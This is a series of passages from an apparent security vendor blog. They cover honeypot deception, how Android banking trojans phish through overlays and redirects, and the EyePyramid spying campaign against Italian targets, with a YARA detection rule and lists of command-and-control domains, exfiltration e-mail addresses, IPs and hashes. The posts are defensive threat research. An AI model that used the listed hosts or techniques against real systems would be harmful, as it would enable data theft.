However, it’s often the case that a poorly deployed trap inside a corporate network will not only be successfully detected and bypassed by the attackers but can serve as an entry point to genuine workstations and servers containing valuable information.

Incorrect implementation of a honeypot in the corporate network can be likened to building a small house next to a larger building containing valuable data. The smaller house is unlikely to divert the attention of the attacker; they will know where the valuable information is and where to look for the “key” to access it.

Simply installing and configuring honeypots is not enough to effectively combat cybercriminals; a more nuanced approach to developing scenarios to detect targeted attacks is required. At the very least, it is necessary to carry out an expert evaluation of the attacker’s potential actions, to set honeypots so that the attacker cannot determine which resources (workstations, files on workstations and servers, etc.) are traps and which are not, and to have a plan for dealing with the detected activity.

Correct implementation of traps and a rapid response to any events related to them make it possible to build an infrastructure where almost any attacker will lose their way (fail to find the protected information and reveal their presence).

Forewarned is forearmed

Getting information about a cybercriminal in the corporate network enables the defending side to take measures to protect their valuable data and eliminate the threat:

  • to send the attacker in the wrong direction (e.g., to a dedicated subnet), and thereby concealing valuable resources from their field of view, as well as obtaining additional information about the attacker and their tools, which can be used to investigate the incident further;
  • to identify compromised resources and take all necessary measures to eliminate the threat (e.g., to isolate infected workstations from the rest of the resources on the corporate network);
  • to reconstruct the chronology of actions and movements of the attacker inside the corporate network and to define the entry points so that they can be eliminated.
Conclusion

The attacker has an advantage over the defender, because they have the ability to thoroughly examine their victim before carrying out an attack. The victim doesn’t know where the attack will come from or what the attacker is interested in, and so has to protect against all possible attack scenarios, which requires a significant amount of time and resources.

Implementation of the Threat Deception approach gives the defending side an additional source of information on threats thanks to resource traps. The approach also minimizes the advantage enjoyed by the attacker due to both the early detection of their activity and the information obtained about their profile that enables timely measures to be taken to protect valuable data. It is not necessary to use prohibited “offensive security” methods, which could make the situation worse for the defending side if law enforcement agencies get involved in investigating the incident.

Interactive security measures that are based on deceiving the attacker will only gain in popularity as the number of incidents in the corporate and public sector increases. Soon, systems based on the Threat Deception approach will become not just a tool of the researchers but an integral part of a protected infrastructure and yet another source of information about incidents for security services.

If you’re interested in implementing the Threat Deception concept described in the post on your corporate network, please complete the form below:

Contact Us If you want to learn more on how ATMs are hacked as well as how to endure protection, fill out the form below.
  • First Name*
  • Second Name*
  • Email*
  • Company*
  • Number of PCs in your Company*
  • CountryUnited StatesUnited KingdomRussiaAfghanistanAlbaniaAlgeriaAmerican SamoaAndorraAngolaAntigua and BarbudaArgentinaArmeniaAustraliaAustriaAzerbaijanBahamasBahrainBangladeshBarbadosBelarusBelgiumBelizeBeninBermudaBhutanBoliviaBosnia and HerzegovinaBotswanaBrazilBruneiBulgariaBurkina FasoBurundiCambodiaCameroonCanadaCape VerdeCayman IslandsCentral African RepublicChadChileChinaColombiaComorosCongo, Democratic Republic of theCongo, Republic of theCosta RicaCôte d'IvoireCroatiaCubaCyprusCzech RepublicDenmarkDjiboutiDominicaDominican RepublicEast TimorEcuadorEgyptEl SalvadorEquatorial GuineaEritreaEstoniaEthiopiaFaroe IslandsFijiFinlandFranceFrench PolynesiaGabonGambiaGeorgiaGermanyGhanaGreeceGreenlandGrenadaGuamGuatemalaGuineaGuinea-BissauGuyanaHaitiHondurasHong KongHungaryIcelandIndiaIndonesiaIranIraqIrelandIsraelItalyJamaicaJapanJordanKazakhstanKenyaKiribatiNorth KoreaSouth KoreaKosovoKuwaitKyrgyzstanLaosLatviaLebanonLesothoLiberiaLibyaLiechtensteinLithuaniaLuxembourgMacedoniaMadagascarMalawiMalaysiaMaldivesMaliMaltaMarshall IslandsMauritaniaMauritiusMexicoMicronesiaMoldovaMonacoMongoliaMontenegroMoroccoMozambiqueMyanmarNamibiaNauruNepalNetherlandsNew ZealandNicaraguaNigerNigeriaNorthern Mariana IslandsNorwayOmanPakistanPalauPalestine, State ofPanamaPapua New GuineaParaguayPeruPhilippinesPolandPortugalPuerto RicoQatarRomaniaRwandaSaint Kitts and NevisSaint LuciaSaint Vincent and the GrenadinesSamoaSan MarinoSao Tome and PrincipeSaudi ArabiaSenegalSerbiaSeychellesSierra LeoneSingaporeSint MaartenSlovakiaSloveniaSolomon IslandsSomaliaSouth AfricaSpainSri LankaSudanSudan, SouthSurinameSwazilandSwedenSwitzerlandSyriaTaiwanTajikistanTanzaniaThailandTogoTongaTrinidad and TobagoTunisiaTurkeyTurkmenistanTuvaluUgandaUkraineUnited Arab EmiratesUruguayUzbekistanVanuatuVatican CityVenezuelaVietnamVirgin Islands, BritishVirgin Islands, U.S.YemenZambiaZimbabwe
jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 13) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [13, 1]) } );

Do web injections exist for Android?

Wed, 01/18/2017 - 02:57

Web injection attacks

There’s an entire class of attacks that targets browsers – so-called Man-in-the-Browser (MITB) attacks. These attacks can be implemented using various means, including malicious DLLs, rogue extensions, or more complicated malicious code injected into pages in the browser by spoofing proxy servers or other ways. The purpose of an MITB attack may vary from relatively innocuous ad spoofing on social networks or popular websites to stealing money from user accounts – the latter is what happened in the Lurk case.

A malicious app masquerades as a Kaspersky Lab product in an MITB attack

Web injection is used in most cases when an MITB-class attack targets online banking. This type of web injection attack involves malicious code being injected into an online banking service webpage to intercept the one-time SMS message, harvest information about the user, spoof banking details, etc. For example, our Brazilian colleagues have long reported about barcode spoofing attacks performed when users print out Boletos – popular banking documents issued by banks and all kind of businesses in Brazil.

Meanwhile, the prevalence of MITB attacks in Russia is decreasing – cybercriminals are opting for other methods and attack vectors to target banking clients. For the average cybercriminal, it is much easier to use readily available tools than develop and implement web injection tools.

Despite this, we’re often asked if there are any web injection attacks for Android devices. This is our attempt to investigate and give as full an answer as possible.

Web injection on Android

Despite the term ‘inject’ being used in connection with mobile banking Trojans (and sometimes used by cybercriminals to refer to their data-stealing technologies), Android malware is a whole different world. In order to achieve the same goals pursued by web injection tools on computers, the creators of mobile Trojans use two completely different technologies: overlaying other apps with a phishing window, and redirecting the user from a banking web page to a specially crafted phishing page.

Overlaying apps with phishing windows

This is the most popular technology with cybercriminals and is used in practically all banking Trojans. 2013 was when we first encountered a piece of malware overlaying other apps with its phishing window – that was Trojan-Banker.AndroidOS.Svpeng.

Today’s mobile banking Trojans most often overlay the Google Play Store app with their phishing window – this is done in order to steal the user’s bank card details.

The Marcher malware

Besides this, Trojans often overlay various social media and instant messaging apps and steal the passwords to them.

The Acecard malware

However, mobile banking Trojans typically target financial applications, mostly banking apps.

Three methods of MITB attacks for mobile OS can be singled out:

1. A special Trojan window, crafted beforehand by cybercriminals, is used to overlay another app’s window. This method was used, for example, by the Acecard family of mobile banking Trojans.

Acecard phishing windows

2. Apps are overlaid with a phishing web page located on a malicious server. This way, the cybercriminals can modify its contents any time they need to. This method is used by the Marcher family of banking Trojans.

Marcher phishing page

3. A template page is downloaded from a malicious server, to which the icon and the name of the attacked application is added. This is how one of the Trojan-Banker.AndroidOS.Faketoken modifications manages to attack over 2,000 financial apps.

FakeToken phishing page

It should be noted that starting from Android 6, for the above attack method to work, the FakeToken Trojan has to request the privilege of displaying its window on top of other app windows. It’s not alone though: as new versions of Android are gaining popularity, a growing number of mobile banking Trojans are beginning to request such privileges.

Redirecting the user from the bank’s page to a phishing page

We were only able to identify the use of this technology in the Trojan-Banker.AndroidOS.Marcher family. The earliest versions of the Trojan that redirected the user to a phishing page are dated late April 2016, and the latest are from the first half of November 2016.

Redirecting the user from a bank’s webpage to a phishing page works as follows. The Trojan subscribes to modify browser bookmarks, which includes changes in the current open page. This way the Trojan knows which webpage is currently open, and if it happens to be one of the targeted pages, the Trojan opens the corresponding phishing page in the same browser and redirects the user there. We were able to find over a hundred web pages belonging to financial organizations that were targeted by the Marcher family of Trojans.

However, two points need to be raised:

  • All new modifications of the Marcher Trojan that we were able to detect no longer use this technology.
  • Those modifications that used this technology also used a method of overlaying other apps with their phishing window.

Why then was the method of redirecting the user to a phishing page used by only one family of mobile banking Trojans, and why is this technology no longer used in newer modifications of the family? There are several reasons:

  • In Android 6 and later versions, this technology no longer works, meaning the number of potential victims is decreasing every day. For example, around 30% of those using Kaspersky Lab’s mobile security solutions now use Android 6 or a later version;
  • The technology only worked on a limited number of mobile browsers;
  • The user can easily spot that they are being redirected to a phishing site and they may also notice that the URL of the webpage has changed.
Attacks launched using root privileges

With superuser privileges, Trojans can perform any attack, including real malicious injections into browsers. Although we were unable to find a single case of this happening, the following should be noted:

  • Some modules of Backdoor.AndroidOS.Triada can substitute websites in certain browsers, using superuser privileges. All the attacks we found were launched with the purpose of making some money from advertising only, and did not result in the theft of banking information.
  • The banking Trojan Trojan-Banker.AndroidOS.Tordow, using superuser privileges, can steal passwords saved in browsers, which may include passwords to financial websites.
Conclusions

We can state that, despite all the available technical capabilities, cybercriminals that target banks do not make use of malicious web injections in mobile browsers or injections in mobile apps. Sometimes they use these technologies to spoof adverts, but even then that requires highly sophisticated malicious software.

So why do cybercriminals ignore the available opportunities? Most probably it is because of the diversity of mobile browsers and apps. Malware writers would have to adapt their creations to a long list of programs, which is rather costly, while simpler and more versatile attacks involving phishing windows do not require so much effort to target a larger number of users.

Nonetheless, the Triada and Tordow examples suggest that similar attacks may well take place in the future as malware creators gain more expertise.

The “EyePyramid” attacks

Thu, 01/12/2017 - 09:54

On January 10, 2017, a court order was declassified by the Italian police, in regards to a chain of cyberattacks directed at top Italian government members and institutions.

The attacks leveraged a malware named “EyePyramid” to target a dozen politicians, bankers, prominent freemasons and law enforcement personalities in Italy. These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank.

The malware was spread using spear-phishing emails and the level of sophistication is low. However, the malware is flexible enough to grant access to all the resources in the victim’s computer.

During the investigation, involved LEAs found more than 100 active victims in the server used to host the malware, as well as indications that during the last few years the attackers had targeted around 16,000 victims. All identified victims are in Italy, most of them being Law Firms, Consultancy services, Universities and even Vatican Cardinals.

Evidence found on the C&C servers suggests that the campaign was active since at least March 2014 and lasted until August 2016. However, it is suspected that the malware was developed and probably used years before, possibly as far back to 2008.

Two suspects were arrested on January 10th, 2017 and identified as 45-year-old nuclear engineer Giulio Occhionero and his 47-year-old sister Francesca Maria Occhionero.

Investigation

Although the Italian Police Report doesn’t include malware hashes, it identified a number of C&C servers and e-mails addresses used by the malware for exfiltration of stolen data.

Excerpt from the Italian court order on #EyePyramid
(http://www.agi.it/pictures/pdf/agi/agi/2017/01/10/132733992-5cec4d88-49a1-4a00-8a01-dde65baa5a68.pdf)

Some of the e-mail addresses used for exfiltration and C&C domains outlined by the police report follow:

E-mail Addresses used for exfiltration gpool@hostpenta[.]com hanger@hostpenta[.]com hostpenta@hostpenta[.]com purge626@gmail[.]com tip848@gmail[.]com dude626@gmail[.]com octo424@gmail[.]com tim11235@gmail[.]com plars575@gmail[.]com Command-and-Control Servers eyepyramid[.]com hostpenta[.]com ayexisfitness[.]com enasrl[.]com eurecoove[.]com marashen[.]com millertaylor[.]com occhionero[.]com occhionero[.]info wallserv[.]com westlands[.]com

Based on these indicators we’ve quickly written a YARA rule and ran it through our systems, in order to see if it matches any samples.

Here’s how our initial “blind”-written YARA rule looked like:

rule crime_ZZ_EyePyramid {

meta:

copyright = ” Kaspersky Lab”
author = ” Kaspersky Lab”
maltype = “crimeware”
filetype = “Win32 EXE”
date = “2016-01-11”
version = “1.0”

strings:

$a0=”eyepyramid.com” ascii wide nocase fullword
$a1=”hostpenta.com” ascii wide nocase fullword
$a2=”ayexisfitness.com” ascii wide nocase fullword
$a3=”enasrl.com” ascii wide nocase fullword
$a4=”eurecoove.com” ascii wide nocase fullword
$a5=”marashen.com” ascii wide nocase fullword
$a6=”millertaylor.com” ascii wide nocase fullword
$a7=”occhionero.com” ascii wide nocase fullword
$a8=”occhionero.info” ascii wide nocase fullword
$a9=”wallserv.com” ascii wide nocase fullword
$a10=”westlands.com” ascii wide nocase fullword
$a11=”217.115.113.181″ ascii wide nocase fullword
$a12=”216.176.180.188″ ascii wide nocase fullword
$a13=”65.98.88.29″ ascii wide nocase fullword
$a14=”199.15.251.75″ ascii wide nocase fullword
$a15=”216.176.180.181″ ascii wide nocase fullword
$a16=”MN600-849590C695DFD9BF69481597241E-668C” ascii wide nocase fullword
$a17=”MN600-841597241E8D9BF6949590C695DF-774D” ascii wide nocase fullword
$a18=”MN600-3E3A3C593AD5BAF50F55A4ED60F0-385D” ascii wide nocase fullword
$a19=”MN600-AD58AF50F55A60E043E3A3C593ED-874A” ascii wide nocase fullword
$a20=”gpool@hostpenta.com” ascii wide nocase fullword
$a21=”hanger@hostpenta.com” ascii wide nocase fullword
$a22=”hostpenta@hostpenta.com” ascii wide nocase fullword
$a23=”ulpi715@gmx.com” ascii wide nocase fullword
$b0=”purge626@gmail.com” ascii wide fullword
$b1=”tip848@gmail.com” ascii wide fullword
$b2=”dude626@gmail.com” ascii wide fullword
$b3=”octo424@gmail.com” ascii wide fullword
$b4=”antoniaf@poste.it” ascii wide fullword
$b5=”mmarcucci@virgilio.it” ascii wide fullword
$b6=”i.julia@blu.it” ascii wide fullword
$b7=”g.simeoni@inwind.it” ascii wide fullword
$b8=”g.latagliata@live.com” ascii wide fullword
$b9=”rita.p@blu.it” ascii wide fullword
$b10=”b.gaetani@live.com” ascii wide fullword
$b11=”gpierpaolo@tin.it” ascii wide fullword
$b12=”e.barbara@poste.it” ascii wide fullword
$b13=”stoccod@libero.it” ascii wide fullword
$b14=”g.capezzone@virgilio.it” ascii wide fullword
$b15=”baldarim@blu.it” ascii wide fullword
$b16=”elsajuliette@blu.it” ascii wide fullword
$b17=”dipriamoj@alice.it” ascii wide fullword
$b18=”izabelle.d@blu.it” ascii wide fullword
$b19=”lu_1974@hotmail.com” ascii wide fullword
$b20=”tim11235@gmail.com” ascii wide fullword
$b21=”plars575@gmail.com” ascii wide fullword
$b22=”guess515@fastmail.fm” ascii wide fullword

condition:

((uint16(0) == 0x5A4D)) and (filesize < 10MB) and
((any of ($a*)) or (any of ($b*)) )
}

To build the YARA rule above we’ve used every bit of existing information, such as custom e-mail addresses used for exfiltration, C&C servers, licenses for the custom mailing library used by the attackers and specific IP addresses used in the attacks.

Once the YARA rule was ready, we’ve ran it on our malware collections. Two of the initial hits were:

MD5 778d103face6ad7186596fb0ba2399f2 File size 1396224 bytes Type Win32 PE file Compilation Timestamp Fri Nov 19 12:25:00 2010 MD5 47bea4236184c21e89bd1c1af3e52c86 File size 1307648 bytes Type Win32 PE file Compilation timestamp Fri Sep 17 11:48:59 2010

These two samples allowed us to write a more specific and more effective YARA rule which identified 42 other samples in our summary collections.

At the end of this blogpost we include a full list of all related samples identified.

Although very thorough, the Police Report does not include any technical details about how the malware was spread other than the use of spear phishing messages with malicious attachments using spoofed email addresses.

Nevertheless, once we were able to identify the samples shown above we used our telemetry to find additional ones used by the attackers for spreading the malware in spear-phishing emails. For example:

From: Di Marco Gianmaria
Subject: ricezione e attivazione
Time:2014/01/29 13:57:42
Attachment: contatto.zip//Primarie.accdb (…) .exe

From: Michelangelo Giorgianni
Subject: R: Re: CONVOCAZIONE]
Time: 2014/01/28 17:28:56]
Attachment: Note.zip//sistemi.pdf (…) .exe

Other attachment filenames observed in attacks include:

  • Nuoveassunzioni.7z
  • Assunzione.7z
  • Segnalazioni.doc (…) 7z.exe
  • Regione.7z
  • Energy.7z
  • Risparmio.7z
  • Pagati.7z
  • Final Eight 2012 Suggerimenti Uso Auricolari.exe
  • Fwd Re olio di colza aggiornamento prezzo.exe
  • Approfondimento.7z
  • Allegato.zip
  • Eventi.bmp (…) .exe
  • Quotidiano.mdb (…) _7z.exe
  • Notifica operazioni in sospeso.exe

As can be seen the spreading relied on spearphishing e-mails with attachments, which relied on social engineering to get the victim to open and execute the attachment. The attachments were ZIP and 7zip archives, which contained the EyePyramid malware.

Also the attackers relied on executable files masking the extension of the file with multiple spaces. This technique is significant in terms of the low sophistication level of this attack.

High profile victims

Potential high-profile Italian victims (found as recipients of spear-phishing emails according to the police report) include very relevant Italian politicians such as Matteo Renzi or Mario Draghi.

It should be noted however there is no proof than any of them got successfully infected by EyePyramid – only that they were targeted.

Of the more than 100 active victims found in the server, there’s a heavy interest in Italian law firms and lawyers. Further standout victims, organizations, and verticals include:

Professional firms, Consultants Universities Vaticano Construction firms Healthcare

Based on the KSN data for the EyePyramid malware, we observed 92 cases in which the malware was blocked, of which the vast majority (80%) of them were in Italy. Other countries where EyePyramid has been detected includes France, Indonesia, Monaco, Mexico, China, Taiwan, Germany and Poland.

Assuming their compilation timestamp are legit – and they do appear correct, most of the samples used in the attacks have been compiled in 2014 and 2015.

Conclusions

Although the “EyePyramid” malware used by the two suspects is neither sophisticated nor very hard to detect, their operation successfully compromised a large number of victims, including high-profile individuals, resulting in the theft of tens of gigabytes of data.

In general, the operation had very poor OPSEC (operational security); the suspects used IP addresses associated with their company in the attacks, discussed the victims using regular phone calls and through WhatsApp and, when caught, attempted to delete all the evidence.

This indicates they weren’t experts in the field but merely amateurs, who nevertheless succeeded in stealing considerably large amounts of data from their victims.

As seen from other known cyberespionage operations, it’s not necessary for the attackers to use high profile malware, rootkits, or zero-days to run long-standing cyberespionage operations.

Perhaps the most surprising element of this story is that Giulio Occhionero and Francesca Maria Occhionero ran this cyber espionage operation for many years before getting caught.

Kaspersky Lab products successfully detect and remove EyePyramid samples with these verdicts:

  • HEUR:Trojan.Win32.Generic
  • Trojan.Win32.AntiAV.choz
  • Trojan.Win32.AntiAV.ciok
  • Trojan.Win32.AntiAV.cisb
  • Trojan.Win32.AntiAV.ciyk
  • not-a-virus:HEUR:PSWTool.Win32.Generic
  • not-a-virus:PSWTool.Win32.NetPass.aku

A full report #EyePyramid, including technical details of the malware, is available to customers of Kaspersky APT Intelligence Services. Contact: intelreports (at) kaspersky [dot] com.

To learn how to write YARA rules like a GReAT Ninja, consider taking a master class at Security Analyst Summit. – https://sas.kaspersky.com/#trainings

References and Third-Party Articles Indicators of Compromise Hashes:

09ff13b020de3629b0547e0312a6c135
102bccd95e5d8a56c4f7e8b902f5fb71
12f3635ab1de63fbcb5e1c492424c605
1391d37c6b809f48be7f09aa0dab7657
1498b8d6e946b5d6b529abea13592381
14db577a9b0bfc62f3a25a9a51765bc5
17af7e00936dcc8af376ad899501ad8b
192d5866cbfafae36d5ba321c817bc14
325f5d379c4d091743ca8581f15d3295
36bd8feed1b17c59f3c653e6427661a4
380b0f1921fed82e1b68b4e442b04f05
3c30f0114c600510fdb2573cc48d5c06
3fed695e2a6e63d971c16fd9e825fec5
47bea4236184c21e89bd1c1af3e52c86
47dd1e017aae694abd2b7bc0b12cf1da
47f1f9b1339147fe2d13772b4cb81030
53b41dc0b8fd9663047f71bc91a317df
5bc1b8c07c0f83d438a3e891dc389954
5eb17f400f38c1b65990a8d60c298d95
6de1e478301d59ac14b8e9636b53815d
75621de46a12234af0bec15620be6763
778d103face6ad7186596fb0ba2399f2
859f60cd5d0f0fbd91bde3c3914cbb18
8afb6488655cbea2737d2423843ea077
9173aefe64b7704510c873e2ce7305e0
92c32eb72f5713ca1f2a8dc918f1f770
932bd2ad79cbca4341d853a4b5ea1da5
94eff87eca2f054aa5fbc1877a6cf919
98825a1ce35f46d004c0839e87cc2778
9b8571b5281f3751750d3099049098e0
9c57839b3f8462bd6c2d36db80cd5ecc
9d3ce3246975ae6d545ee9e8ba12d164
9d4b46d3c389e0144238c821670f8537
a41c5374a14a2c7cbe093ff6b075e8ac
b39a673a5d2ceaa1fb5571769097ca77
b533b082ed1458c482c3663ee12dc3a4
bcfd544df7d8e9a2efe9d2ed32e74cad
c0243741bfece772f02d1657dc057229
c38e9edc0e4b18ff1fc5b61b771f7946
ce76b690dc98844c721e6337cd5e7f4b
cf391937d79ed6650893b1d5fbed0604
d8432ddec880800bfa060af1f8c2e405
eb604e7e27727a410fc226196c13afe9
fafd293065daf126a9ad9562fc0b00b2

Related hashes identified by @GaborSzappanos:

014f69777d2e0c87f2954ad252d52810
02965c8a593989ff7051ec24736da6bd
04b3c63907c20d9be255e167de89a398
04e949f64e962e757f5bb8566c07800b
06e47736256c54d9dd3c3c533c73923e
09ff13b020de3629b0547e0312a6c135
0a80fd5abf270ddd8080f93505854684
0b3c1ff3b3b445f46594227ca2babdcd
0c33c00a5f0f5bde8c426c3ce376eb11
0ded0389cbddeeb673836794269ffb3b
0e19913ce9799a05ba97ac172ec5f0bc
11062b36893c4ba278708ec3da07b1dd
12b4d543ae1b98df15c8712d888c54f0
1334a7df1e59380206841d05d8400778
14cb305de2476365ef02d2226532dd34
1748c33cb5ac6f26d55cd1a58b68df8a
18e24ef2791030693a4588bfcae1dec0
192d5866cbfafae36d5ba321c817bc14
1b4d423350cd1159057dd7dbef479328
1deb28ae7b64fb44358e69e5afd1f600
2222a947ebccc8da16badeacca05df4b
23beed8aaac883a5902039e6fd84ee5f
2485e7ae3e0705898b7787ed0961878d
2642990a46c434e7787a599f04742a32
268698314c854bc483d05ffe459dc540
2866ced99b46b39838f56fbe704d387b
2896ae0489451d32f57c68b919b3fa72
28ba7d1a4c5d64a65f2f2bf5f6ced123
28e65b9577abaabf3f8c94d9fda50fc5
2a809644e6d07dc9fc111804a62b8089
30215197622f5c747fc869992768d9c6
325f5d379c4d091743ca8581f15d3295
33890f9268023cd70c762ad2054078c7
3673c155eb6a0bd8a94bea265ebb8b76
369cd42dfabea188fa57f802a83b55d9
380b0f1921fed82e1b68b4e442b04f05
3a0af8bba61734b043edc0f6c61cd189
3c30f0114c600510fdb2573cc48d5c06
3db711afc09c0a403a8ccff6a8a958df
3e4365b079239b0a2451f48f33761332
3ebbae038d7bf19baa1bcfbc438bb5e7
3fed695e2a6e63d971c16fd9e825fec5
3ffcd0eedd79a9cc79c2c4a0f7e04b21
4025834a88dcfba3ed1774068c64c546
417593eaf61d45e88adbad259d5585d0
422fe9c78c71fb30d376e28ad1c41884
44d91f49f261da6b1f183ea131d12a7f
45dde4082c0407b9904c5f284080337f
47bea4236184c21e89bd1c1af3e52c86
4a494c20bcfb77afd06908eb5a9718cb
53b41dc0b8fd9663047f71bc91a317df
5523aa1d4ee5f19522299be6f1111b89
5627cb8752c4c0774f822ccf8f1363eb
56499e0b590857f73bb54f500008c656
568895c8340a88316fdc0d77a7f2a91d
5847072fd4db9e83d02d8b40a1d67850
5accd89d6483dec54acc7b1484dfbace
5b5f3f65b372f9e24dbc50b21fe31f81
5bc1b8c07c0f83d438a3e891dc389954
622fb530276a639892398410de03d051
63d9e7cca593360411b5d05a555d52f3
6648a255610c5f60f580098bbc1d387c
690cdf20faf470f828fe468a635da34e
6c25a0974a907d368372ac460d8261d6
6c5693df933924e8a633ccfd7ef2635d
6ff7876db06d9102786ae0e425aeaf37
70882709d86e2a7396779f4111cd02e3
70f094e347d4088573c9af34430a3cd6
72ffb3418d3cde6fdef16b5b5db01127
734cfa84d68506fe6e74eb1b038d9c70
7633748203b705109ededadfbe08dcfa
778d103face6ad7186596fb0ba2399f2
77c2a369d0850c7a75487e8eee54b69e
78b7d1caa4185f02b1c5ef493bf79529
7971c90d7533f2c69e33f2461434096a
7aad90ce44e355f95b820fb59c9f5d56
7bf348005958658ba3fcf5ccb3e2ae22
7cddc3b26bb8f98e9b14d9c988f36f8f
81624dc108e2d3dc712f3e6dd138736a
820ca39f331f068cca71e7a7c281e4ac
84c14a1327ae7c0e5a07a67a57451cc4
860f607dbd0d6a2dc69cbc4f3b0eeeaf
889c86aaf22876516964eafa475a2acd
88c31f3b589d64a275608f471163989c
89368652dc98b13f644ec2e356c7707c
89696dbead484bf948c1dd86364672eb
898150dea4d7275f996e7341463db21f
8b27bcfa38205754c8e5fdf6a509d60e
8f419bca20b767b03f128a19b82611ab
915cc3c9c8cb8e200dbe04e425e7018b
92c32eb72f5713ca1f2a8dc918f1f770
932bd2ad79cbca4341d853a4b5ea1da5
98825a1ce35f46d004c0839e87cc2778
98b1157b9f3f3ec183bf322615f1ce41
9b19729531bf15afc38dd73bcc0596f8
9c99ecf33301e4cafdd848a7d3d77ef9
9cf08b15724e0eaf69a63e47690cdee2
a16d8cf9a7a52e5c2ad6519766ae6b92
a35312a5c0b06ee89ddadaea9ca6bad2
a4c551ec6d3b5ab08a252231439e099f
a615a4f5e93a63682a8f25b331f62882
a6c29f9680fe5ae10a9250e5431754d4
ab71ca072d4b526e258c21bd84ec0632
ac6fa4005e587ac4b3456a14bd741ff0
afab0fcbf8bc6595f9f2c0051b975a4e
b1ddec2f71727dcf747e1d385272e24d
b2a756f557d273d81a61edc9fbfc9daf
b2e1663647addc92bf253f389ac98027
b39a673a5d2ceaa1fb5571769097ca77
b533b082ed1458c482c3663ee12dc3a4
b6e86ac7d3bbedf18b98437df49c1b60
b70ddb9f6e4e2c85e80cf2079b10e762
b89a8d3442d96161cef07552116407c3
bb2a0aee38980aeb39cac06677936c96
bc333001d3f458ff8fde9d989b53e16d
bd7a2b795419c0b842fd041eaac36d7f
bf850dcb074e0cf2e30fbee6bfaa4cd9
c0d4e5ba26ef3c08dc1a29ac7496f015
c38832f484645b516b57f6813c42d554
c4abb3210f26d4a15a0d4fd41b47ee0e
c547a30fa39f22e2093b51ed254bb1c2
c69c370fcb7b645aaac086b2a3b18286
c7ef4c7b12b5ad8198dafc58c4bea2a3
c97ef1f13bf3d74c78f50fa7abe7766b
ca010bcdfe3c4965df0c6bc12b40db76
ca243796e79c87c55f67a61bc3ee8ddc
ca9a7c6b231fadfae3466da890b434c5
cf391937d79ed6650893b1d5fbed0604
cf3b3c796114f6908a35542d4fd02b0e
d034810ddab55c17dcddd2c2990b3ef3
d1273537add3f2282391726489c65e38
d20487e2d2f674bfd849cb8730225dde
d8432ddec880800bfa060af1f8c2e405
d864ad5030d354c1e40a873a335b2611
dac10dcede69eb9b4ccce8e6798f332c
db95221ebed1793bf5b5527ecb52eb0c
dc64307ef67177449b31c6bb829edbf2
dd734c07b94c8685bb809f83876c7193
e0e862dbf001eb4a169d3340c200b501
e727b444a6a9fa9d40a34a9508b1079f
e7539ed9616b61c12028a663c298f6be
e78ed9fac4f3e9b443abd02bfa9f3db2
e85ff9e3a27899b0d1de8b958af5ad90
eb604e7e27727a410fc226196c13afe9
eba8aa2572cf0d6ccdf99c34cc26b6f3
ec21252421f26072e9fe75586eb6b58a
ee9435593494f17f3efc3a795c45482e
eeca6409dcf0e46d0182d53d230c701d
eff2d3f9f56e9aabcf970c4c09fe7ef8
f0b61a531a72f0cc02d06d2ebfb935ab
f1a037e2edc5ddf4db4e1e7fcd33d5fb
f3802442727c0b614482455d6ad9edc2
f41be516fa8da87a269845c9ea688749
f7d4742d2e746962440bf517b261f126
f96335bf0512c6e65ea374a844ab7ceb
f9b4459f18ca9d2974cf5a58495c5879
fa4266c305aa75a133ebae2a4dcc9b75
fafd293065daf126a9ad9562fc0b00b2

Backdoor Filenames:

pnbwz.exe
pxcfx.exe
qislg.exe
rqklt.exe
runwt.exe
ruzvs.exe
rvhct.exe
vidhdw.exe
winlng.exe
wxrun.exe
xddrv.exe
xdwdrv.exe

Malicious attachments filenames (weak indicators):

contatto.zip//Primarie.accdb (…) .exe
Note.zip//sistemi.pdf (…) .exe
Nuoveassunzioni.7z
Assunzione.7z
Segnalazioni.doc (…) 7z.exe
Regione.7z
Energy.7z
Risparmio.7z
Pagati.7z
Final Eight 2012 Suggerimenti Uso Auricolari.exe
Fwd Re olio di colza aggiornamento prezzo.exe
Approfondimento.7z
Allegato.zip
Eventi.bmp (…) .exe
Quotidiano.mdb (…) _7z.exe

Holiday 2016 financial cyberthreats overview

Wed, 01/11/2017 - 03:57

Introduction

Last November we conducted a brief analysis of the threat landscape over the holiday period – from October to December in 2014 and 2015 – to find out if the number of financial cyberattacks during this time differs to that usually seen throughout the year. The retrospective analysis found that the percentage of phishing attacks during this period was higher than the average yearly rate. The dynamics of financial malware attacks also clearly showed that in 2014 and 2015, criminals staged their malicious campaigns to match dates around the Black Friday – Cyber Monday period, and also around Christmas and the New Year.

Based on this data we made the following prognosis: the same holiday period in 2016 will see a spike in cyberattacks. Now that the holidays are over, it is time to find out how accurate that prediction was.

Financial phishing The numbers

As seen in the table below, unlike in previous years, the difference between the overall yearly results and the results in Q4 is not significant. However, the percentage of financial phishing attacks blocked by Kaspersky Lab products in Q4 2016 was higher than the total average for the year.

2013 Full year Q4 Financial phishing total 31.45% 32.02% E-shop 6.51% 7.80% E-banks 22.20% 18.76% E-payments 2.74% 5.46% 2014 Full year Q4 Financial phishing total 28.73% 38.49% E-shop 7.32% 12.63% E-banks 16.27% 17.94% E-payments 5.14% 7.92% 2015 Full year Q4 Financial phishing total 34.33% 43.38% E-shop 9.08% 12.29% E-banks 17.45% 18.90% E-payments 7.08% 12.19% 2016 Full year Q4 Financial phishing total 47.48% 48.13% E-shop 10.17% 10.41% E-banks 25.76% 26.35% E-payments 11.55% 11.37%

Moreover, the Q4 2016 results are the highest we’ve seen so far. 48.13% of all phishing attacks registered by Kaspersky Lab products were focused on gleaning users’ financial data, which is 0.65% higher than the average share of financial phishing in 2016, and 4.75% more than in the same period in 2015. However, the holiday period is not the only reason for such a high percentage of financial attacks. Phishing scams are the easiest way for even low level professional criminals to earn money. The preparation and supporting stages for such scams don’t require a lot of specific tools or knowledge, yet they bring a good return. In other words, phishing attacks appear more attractive to criminals due to their ease and affordability, when compared to staging a financial malware attack. This has resulted in the growth in popularity of phishing.

Delivered on time

As evidenced in our original analysis of the threat landscape during the holiday period in 2014 and 2015, criminals were trying to tie their phishing campaigns to certain dates which resulted in a visible increase in the number of attacks during the Black Friday, Cyber Monday and also Christmas periods. The 2016 figures showed no difference but we’ve seen an increase in the number of attacks which utilized well-known brands from the online retail and financial industries.

